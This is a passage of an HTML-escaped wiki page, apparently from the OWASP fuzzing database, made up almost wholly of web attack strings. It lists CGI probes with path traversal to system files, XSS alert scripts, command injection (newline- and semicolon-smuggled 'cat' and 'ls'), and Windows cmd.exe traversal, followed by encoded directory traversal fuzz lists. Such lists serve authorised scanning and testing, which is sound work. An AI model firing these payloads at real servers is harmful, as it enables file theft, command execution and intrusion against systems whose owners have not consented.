fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Windows Directory Traversal   (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Windows Directory Traversal   (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (77 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (7 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
